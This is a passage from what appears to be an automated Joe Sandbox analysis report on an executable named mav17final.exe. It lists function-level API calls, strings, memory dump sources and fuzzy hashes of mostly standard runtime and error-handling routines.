                                                  • Instruction Fuzzy Hash: 29118431B18E418AE760AB62E894B35A6A0FBC9FE4F444234DA5D877B5CF7CD4448760
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                   • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                  • String ID: Unhandled exception in script
                                                  • API String ID: 3081866767-2699770090
                                                  • Opcode ID: 9b12c34fca385b1e0ebcb8da6f1b4405c5b5feb8525b654c020fb5a481cc6c3a
                                                  • Instruction ID: 3ebed255250969e0519c601b147b002a431f736ef044844e463731787ba29672
                                                  • Opcode Fuzzy Hash: 9b12c34fca385b1e0ebcb8da6f1b4405c5b5feb8525b654c020fb5a481cc6c3a
                                                  • Instruction Fuzzy Hash: CE312E72A09A8289EB30EB31E8955FDA360FF89784F844135EA4E47B69DF3CD105C760
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79EA486F3,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA4101D), ref: 00007FF79EA42A14
                                                    • Part of subcall function 00007FF79EA48460: GetLastError.KERNEL32(00000000,00007FF79EA42A60), ref: 00007FF79EA48487
                                                    • Part of subcall function 00007FF79EA48460: FormatMessageW.KERNEL32(00000000,00007FF79EA42A60), ref: 00007FF79EA484B6
                                                    • Part of subcall function 00007FF79EA489E0: MultiByteToWideChar.KERNEL32 ref: 00007FF79EA48A1A
                                                  • MessageBoxW.USER32 ref: 00007FF79EA42AEC
                                                  • MessageBoxA.USER32 ref: 00007FF79EA42B08
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                   • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                  • String ID: %s%s: %s$Fatal error detected
                                                  • API String ID: 2806210788-2410924014
                                                  • Opcode ID: abe82f00bef99ceab3cd3b2673c8dde2e3029215b6bdb1f563c87e7f7605427b
                                                  • Instruction ID: 5cad36cb700a26a81886557052978837578c360257d9d347229af5eff1e14bd7
                                                  • Opcode Fuzzy Hash: abe82f00bef99ceab3cd3b2673c8dde2e3029215b6bdb1f563c87e7f7605427b
                                                  • Instruction Fuzzy Hash: 83312571628A8191E630BB21E491BFAA364FB847C4F804036E68D47AA9DF3CD245C770
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                   • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: a7acc4355d879bac73ca0070a96f8c7632362be6a64aaf3ea2d8cf6c7e704423
                                                  • Instruction ID: db9a1b98cb9269ca7c2f3c645775c3667f86b09553eac7d51de87ab343c3f40b
                                                  • Opcode Fuzzy Hash: a7acc4355d879bac73ca0070a96f8c7632362be6a64aaf3ea2d8cf6c7e704423
                                                  • Instruction Fuzzy Hash: 59F03A61A19A0685EF646B30E8C4B78A360EF88F80F851035D55F46574EE2CD488C330
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                   • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: b937517b4f482d0939308dbd49bace3de9952a95ba32e0c18fc8e236c2565ddb
                                                  • Instruction ID: 0c7ca6fdf0e40c3ba0af4b5f016366a5f8e976d488d73d2b7d1729dfc351f018
                                                  • Opcode Fuzzy Hash: b937517b4f482d0939308dbd49bace3de9952a95ba32e0c18fc8e236c2565ddb
                                                  • Instruction Fuzzy Hash: 14111222E58E1385F7783334E8D9B799145FF97B68F944634EABE0A6F68E1CA8414130
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                   • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                  • API String ID: 3215553584-1196891531
                                                  • Opcode ID: ccb95f15847098836496565d61634b0a9897f76ac7b45429749bb7ab022bb6ee
                                                  • Instruction ID: 482ef05dca9de1b114a0d627aa125bcb30ea047e14bcbe665370b12fd73947bb
                                                  • Opcode Fuzzy Hash: ccb95f15847098836496565d61634b0a9897f76ac7b45429749bb7ab022bb6ee
                                                  • Instruction Fuzzy Hash: 2381B072E0860285F7746F3981D0EBDBAA0EF15B86FD58035DA09572B4CF2DE9019B35
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                   • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Message$ByteCharMultiWide
                                                  • String ID: %s%s: %s$Fatal error detected
                                                  • API String ID: 1878133881-2410924014
                                                  • Opcode ID: 7762545bfdab7d4dcf66979fd066f08ead0e9605e06221d549922be69e8cbe44
                                                  • Instruction ID: 7267e8348452a56d0109d5779c42ef618e257fdb78e11b65e39ad28d86054494
                                                  • Opcode Fuzzy Hash: 7762545bfdab7d4dcf66979fd066f08ead0e9605e06221d549922be69e8cbe44
                                                  • Instruction Fuzzy Hash: 82311471628A8191E630BB21E491BFAA764FB947C4FC04435EA8D47AA9DF3CD205CB74
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,00007FF79EA439BA), ref: 00007FF79EA43EC1
                                                    • Part of subcall function 00007FF79EA429E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79EA486F3,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA4101D), ref: 00007FF79EA42A14
                                                    • Part of subcall function 00007FF79EA429E0: MessageBoxW.USER32 ref: 00007FF79EA42AEC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                   • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastMessageModuleName
                                                  • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                  • API String ID: 2581892565-1977442011
                                                  • Opcode ID: fbc692f4baafbe859fca0023d07415701a2e0dd3eaf1b7cf8d95a3283e939708
                                                  • Instruction ID: 58651aa3a883e562c273f4fa5a437abf17ba7cf765e9036e3fedf011f3910368
                                                  • Opcode Fuzzy Hash: fbc692f4baafbe859fca0023d07415701a2e0dd3eaf1b7cf8d95a3283e939708
                                                  • Instruction Fuzzy Hash: 57018461B19A4295FA70B735E896BB992E1EF4C780FC00031E94D862B7FE5CE1098730
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                   • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo$_get_daylight
                                                  • String ID:
                                                  • API String ID: 72036449-0
                                                  • Opcode ID: 36b426960828c7d9f54d9ae6d583415da6549470ad10fa493736d6e8dab543fb
                                                  • Instruction ID: 4b5c31e8eef13d8d5fa3a4ace19fc23a826e50f80e5a496056f6249f490c07ec
                                                  • Opcode Fuzzy Hash: 36b426960828c7d9f54d9ae6d583415da6549470ad10fa493736d6e8dab543fb
                                                  • Instruction Fuzzy Hash: 1751D132D0CA0246F7787B38A484BBDE680EB5BF14F994134CA49466F6CF3CE8408671
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                   • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                  • String ID:
                                                  • API String ID: 2780335769-0
                                                  • Opcode ID: 35b39605cee2f0bec39b1907a2341c6141e62181e74802fd53fc0af55d5f4a9a
                                                  • Instruction ID: d1a786517f6e61b59d4db21e81330edea95941f751ef144b7b2f734fdb2fb473
                                                  • Opcode Fuzzy Hash: 35b39605cee2f0bec39b1907a2341c6141e62181e74802fd53fc0af55d5f4a9a
                                                  • Instruction Fuzzy Hash: AF518E22E04A418AFB30EF719490BBDB3A1EB68B58F958575DE0D476A9DF38D4818370
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                   • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$DialogInvalidateRect
                                                  • String ID:
                                                  • API String ID: 1956198572-0
                                                  • Opcode ID: 222d2908f78c2ae87f40d4d29d421000ec4f5a81934d325a3cc9435ab5a32f74
                                                  • Instruction ID: 59276936feb21fbb02c66ecd09449a3bb1d9af045df756eb5cf9806d91160dcf
                                                  • Opcode Fuzzy Hash: 222d2908f78c2ae87f40d4d29d421000ec4f5a81934d325a3cc9435ab5a32f74
                                                  • Instruction Fuzzy Hash: 3411AC21E1854142F774A779F58467992A1EFC9B80FC48031DA4906BBDDE3CE4C54730
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                   • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-3916222277
                                                  • Opcode ID: 561aa88df7fdb61349e0ce58f807f1a8352d02f5797fb50474d80bf85903fc07
                                                  • Instruction ID: 0f8cbeae50527ff90205fb5ec5fa2dc8437e7bc300a0ad1f06fd53c6659cbc1b
                                                  • Opcode Fuzzy Hash: 561aa88df7fdb61349e0ce58f807f1a8352d02f5797fb50474d80bf85903fc07
                                                  • Instruction Fuzzy Hash: 1A51647A91C60A86E774AF3880C4B7CB7A5FB15B19F943135C60A422B5EF2CE485C731
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                   • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: e+000$gfff
                                                  • API String ID: 3215553584-3030954782
                                                  • Opcode ID: 814d447ac16e6b6f5b3f52da07250c54334cccc87630bfda28cdf0e87c86ffba
                                                  • Instruction ID: bc685cceece1a3424a9a3caf44052dfd9322effcbb06869931d7ff423270ce0b
                                                  • Opcode Fuzzy Hash: 814d447ac16e6b6f5b3f52da07250c54334cccc87630bfda28cdf0e87c86ffba
                                                  • Instruction Fuzzy Hash: E5513862B187C146E7349F36988077DAB91E780B90F88D235DBAC4BBE6CE2CD044C720
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: FileLanguagesModuleNamePreferredRestoreThread_invalid_parameter_noinfo
                                                  • String ID: C:\Users\user\Desktop\mav17final.exe
                                                  • API String ID: 1726085181-2372985319
                                                  • Opcode ID: 6513ab59fd3ebffa9909c11dcfcf25d4117bd67f3801bb89ebe6b139d55717b7
                                                  • Instruction ID: 4aceeb328d5ecda240188b099ce6eaa32ca62792a0ba98fc8a1762de253b0ce8
                                                  • Opcode Fuzzy Hash: 6513ab59fd3ebffa9909c11dcfcf25d4117bd67f3801bb89ebe6b139d55717b7
                                                  • Instruction Fuzzy Hash: 29416036A18B1286EB24FF35A8C08BDB795EF44B90B954035EE4E43BA5DE3DE4418370
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 59f2e813d905b0fd74d22bf7396b879cd5f582deb478cb9eac5e44ccbddea9db
                                                  • Instruction ID: 4ba6fb57bfe64097bce796e264f9d0bc3ebf9b267112894ac31c90114f952784
                                                  • Opcode Fuzzy Hash: 59f2e813d905b0fd74d22bf7396b879cd5f582deb478cb9eac5e44ccbddea9db
                                                  • Instruction Fuzzy Hash: DF41B462A18A8195DB30EF35E4847BEA761FB887A4F854031EE4D877A8EF3CD441C760
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory
                                                  • String ID: :
                                                  • API String ID: 1611563598-336475711
                                                  • Opcode ID: 1f0320950012fe8e14a23f6c4f15084a02658a02bc0f564a754340da70183b2c
                                                  • Instruction ID: e09639a5b1a26118131eae558123b44113bcb68c66c795c4ba3dc074cda0bf10
                                                  • Opcode Fuzzy Hash: 1f0320950012fe8e14a23f6c4f15084a02658a02bc0f564a754340da70183b2c
                                                  • Instruction Fuzzy Hash: 9521D262B0864581EB30AB25D08467EB3A1FBC8B44FC68035DA8E436A4DF7CE9458771
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Message$ByteCharMultiWide
                                                  • String ID: Fatal error detected
                                                  • API String ID: 1878133881-4025702859
                                                  • Opcode ID: b8e8508615fbad4ea20b877775acb8155a3929f0c9030de47d537fc6cd6468c8
                                                  • Instruction ID: 822b6b1da1dac6661c43e39107413242807b1fe05de4a6acd0ad0c3a072f1ecd
                                                  • Opcode Fuzzy Hash: b8e8508615fbad4ea20b877775acb8155a3929f0c9030de47d537fc6cd6468c8
                                                  • Instruction Fuzzy Hash: 07212472628A8191EB30A721F491BFAA764FB84784FC05135EA8D47AA9DF3CD205C770
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Message$ByteCharMultiWide
                                                  • String ID: Error detected
                                                  • API String ID: 1878133881-3513342764
                                                  • Opcode ID: acec89b49bf928f7a13d39fc11b0c7e0425371a071b1d5ebcc82a15e42e87902
                                                  • Instruction ID: 41e759d21684befad27608379055aa783253d805a1c5643a9863f1b40181c42e
                                                  • Opcode Fuzzy Hash: acec89b49bf928f7a13d39fc11b0c7e0425371a071b1d5ebcc82a15e42e87902
                                                  • Instruction Fuzzy Hash: 1F211772728A8191E730A721F491BFAA754FB84784FC05135EA8D47A69DF3DD205C770
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Stringtry_get_function
                                                  • String ID: LCMapStringEx
                                                  • API String ID: 2588686239-3893581201
                                                  • Opcode ID: 2101cb5c07a168839850d0edfb874091af6ebc80072ebc10d1abf884cbf0ab4d
                                                  • Instruction ID: 374391348acb1dda12e658550b3dcb99e694d99f908a0b3ed107087acf1cdb4c
                                                  • Opcode Fuzzy Hash: 2101cb5c07a168839850d0edfb874091af6ebc80072ebc10d1abf884cbf0ab4d
                                                  • Instruction Fuzzy Hash: 98113E32708B8186D770DB66F4806AAB7A0FBC9B80F544135EE8D43B69DF3CD5408B50
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CompareStringtry_get_function
                                                  • String ID: CompareStringEx
                                                  • API String ID: 3328479835-2590796910
                                                  • Opcode ID: 38a36db80e64623837e679e120ce637820d08bf828d5f076ee9ee53737858b40
                                                  • Instruction ID: d28b327ef88a016f45efe50e90e472831ed1f212b516d71cbbcebcf3adf1285a
                                                  • Opcode Fuzzy Hash: 38a36db80e64623837e679e120ce637820d08bf828d5f076ee9ee53737858b40
                                                  • Instruction Fuzzy Hash: 49114D32608B8186D770DB56F4806AAF7A0FBC9B90F544136EE8D93B69DF3CD5408B50
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
